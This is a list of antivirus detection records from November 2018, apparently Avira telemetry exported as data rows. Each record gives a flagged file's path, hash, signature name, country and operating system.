  Row(detection=Row(filename='avscan-20181102-103701-0f14a369', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ded8a93\\AVSCAN-20181102-103625-0AEAADDC\\AVSCAN-20181102-103701-0F14A369', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:37:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xfoahlow.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\XfOahlow.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142043-9952455f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-142043-9952455F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150655-9c61936d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-150655-9C61936D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:10:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055241-7b23171d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055241-7B23171D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052827-1870f74b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052827-1870F74B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054248-19fb4b64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054248-19FB4B64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124905-9bb22be5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-124905-9BB22BE5', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:52:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050353-aa428a04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050353-AA428A04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='download-kentukis rar.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.561\\Download-Kentukis rar.exe', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='6e9bee686936f1bb1bf5d3c2d5d31693f51819edfd11e639c405405497eab92c', metadata=Row(cmdline='\\\\\\"E:\\\\\\\\e books\\\\\\\\Download-Kentukis rar\\\\\\\\Download-Kentukis rar.zip\\\\\\"', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1501648, timestamp='2018-11-02T13:50:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:15:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:17:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054905-fa7a7c27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054905-FA7A7C27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055531-e0e2cde8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055531-E0E2CDE8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052308-5a6fa4e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052308-5A6FA4E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052423-8709f837', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052423-8709F837', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052321-62242c73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052321-62242C73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060346-07e97e7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060346-07E97E7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060436-25cd856f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060436-25CD856F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062612-2a262585', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062612-2A262585', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061800-04e5a0a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061800-04E5A0A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051356-11733fc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051356-11733FC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050912-68466db1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050912-68466DB1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055357-a8ab737e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055357-A8AB737E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054541-810c4022', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054541-810C4022', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055642-0ae9a283', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055642-0AE9A283', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060434-243bc348', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060434-243BC348', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053458-01b8df38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053458-01B8DF38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062017-56a638f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062017-56A638F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054912-fea5eeec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054912-FEA5EEEC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060205-cb95b00b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060205-CB95B00B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052906-3004b003', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052906-3004B003', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053612-2d93fc7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053612-2D93FC7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053935-a6b28592', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053935-A6B28592', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051857-c4b6a260', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051857-C4B6A260', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053805-7153df18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053805-7153DF18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054836-e93e90d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054836-E93E90D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050653-152a86c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050653-152A86C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062236-a97e4f57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062236-A97E4F57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062300-b7cb24fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062300-B7CB24FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:18:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050658-185ca3ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050658-185CA3AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060739-924f13e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060739-924F13E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060640-6f4ec176', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060640-6F4EC176', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050648-12a72023', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050648-12A72023', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051101-a95d04c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051101-A95D04C2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062248-b020e88e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062248-B020E88E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062336-cd0e8b8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062336-CD0E8B8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062346-d2e2241e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062346-D2E2241E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053721-57007793', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053721-57007793', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051149-c61b2418', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051149-C61B2418', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:36:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060925-d18650b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060925-D18650B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051719-8a91d85d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051719-8A91D85D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:18Z'), dt=datetime.date(2018, 11, 2)),
